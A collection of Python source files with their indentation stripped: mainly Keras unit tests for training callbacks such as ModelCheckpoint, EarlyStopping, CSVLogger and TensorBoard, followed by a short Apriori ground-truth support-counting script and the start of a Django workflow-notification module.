@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.5
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 1
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel(object):
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
# The best configuration is in the epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
return
monitor = keras.callbacks.RemoteMonitor()
# This will raise a warning since the default address in unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [keras.callbacks.LearningRateScheduler(lambda x: 1. / (1. + x))]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert (
float(keras.backend.get_value(
model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
random_seed.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
# This should reduce the LR after the first epoch (due to high epsilon).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer(object):
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel(object):
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegexpMatches(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=keras.optimizers.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
for x in csv.reader(f):
# In windows, due to \r\n line ends we may end up reading empty lines
# after each line. Skip empty lines.
if x:
values.append(x)
assert 'nan' in values[-1], 'The last epoch was not logged.'
def test_TerminateOnNaN(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertEqual(loss[0], np.inf)
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains an summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, dirnames, filenames) in os.walk(logdir):
del dirnames # unused
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def _strip_layer_names(self, summaries):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
new_tag = summary.tag.split('/', 1)[1]
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
class TestTensorBoardV2WriteModelTest(test.TestCase):
def setUp(self):
super(TestTensorBoardV2WriteModelTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, write_graph=True)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensoriBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
if __name__ == '__main__':
test.main()
|
GroundTruth.py
|
'''
Calculate ground truth with standard Apriori algorithm
'''
from collections import defaultdict
from models.DataSet import SeqDataSet,Trajectory
from utils.Naming import SupportCountPickleName
import pickle
import multiprocess
import math
from utils.Print import printRound
from models.Apriori import *
def generateCandidates(fragment,util):
res = []
for a in fragment:
for b in fragment:
link = util.linker(a,b)
allowed = []
for li in link:
flag = True
subs = util.sub(li)
for s in subs:
if s not in fragment:
flag = False
break
if flag is True:
allowed.append(li)
res += allowed
return res
def ground_truth_worker(dataset,process_idx,candidates,participents,queue,verbose):
num_milestone = 5
milestone = math.floor(len(participents)/num_milestone)
local_support_count = defaultdict(lambda : 0)
for idx in range(len(participents)):
if idx > 0 and idx % milestone == 0 and verbose:
print("Worker %2d: %d%% done" % (process_idx,int(round(idx*100/len(participents)))))
client_idx = participents[idx]
for candi in candidates:
if dataset[client_idx].checkSub(candi) is True:
local_support_count[candi] += 1
queue.put(local_support_count)
if verbose:
print("Worker %2d: all done" % process_idx)
return
def groundTruth(dataset,args):
if args.pattern_type == 'sequence':
util = seqUtils()
elif args.pattern_type == 'itemset':
util = itemUtils()
elif args.pattern_type == 'item':
util = hitterUtils()
k = int(args.k/args.duplicate)
traj_num = dataset.get_line_num()
frag_len = 0
res = {}
# longer fragments
while True:
frag_len += 1
printRound(frag_len)
if frag_len == 1:
candidates = dataset.init_candidate()
else:
candidates = generateCandidates(fragments,util)
print("%d-fragments: %d candidates" % (frag_len,len(candidates)))
if len(candidates) == 0:
print('Terminal')
return res
support_count = defaultdict(lambda : 0)
if args.process <= 0:
for traj_idx in range(traj_num):
traj = dataset.get_trajectory(traj_idx)
for candi in candidates:
if traj.checkSubSeq(candi) is True:
support_count[candi] += 1
if traj_idx % 10000 == 0 and args.verbose:
print("%d trajectories checked" % traj_idx)
else:
mananger = multiprocess.Manager()
queue = mananger.Queue()
jobs = []
workload = math.floor(traj_num/args.process)
for proc_idx in range(args.process):
if proc_idx == args.process - 1:
participents_load = list(range(proc_idx*workload,traj_num))
else:
participents_load = list(range(proc_idx*workload,(proc_idx+1)*workload))
p = multiprocess.Process(target=ground_truth_worker,args=(dataset,proc_idx,candidates,participents_load,queue,args.verbose))
jobs.append(p)
p.start()
for p in jobs:
p.join()
if args.verbose:
print("Aggregating...")
proc_results = [queue.get() for j in jobs]
for proc_res in proc_results:
for key,value in proc_res.items():
support_count[key] += value
fragments = [key for key,value in support_count.items() if value >= k]
for key,value in support_count.items():
if value >= k:
res[key] = value
print("%d-fragments: %d admitted" % (frag_len,len(fragments)))
|
notify.py
|
# -*- coding: UTF-8 -*-
import datetime
import re
import traceback
from threading import Thread
from django.contrib.auth.models import Group
from sql.models import QueryPrivilegesApply, Users, SqlWorkflow, SqlGroup, WorkflowAudit, WorkflowAuditDetail
from common.config import SysConfig
from sql.utils.group import auth_group_users
from common.utils.sendmsg import MailSender
from common.utils.const import WorkflowDict
import logging
logger = logging.getLogger('default')
# 邮件消息通知,0.all,1.email,2.dingding
def _send(audit_id, msg_type, **kwargs):
msg_sender = MailSender()
sys_config = SysConfig().sys_config
audit_info = WorkflowAudit.objects.get(audit_id=audit_id)
workflow_id = audit_info.workflow_id
workflow_type = audit_info.workflow_type
status = audit_info.current_status
workflow_title = audit_info.workflow_title
workflow_from = audit_info.create_user_display
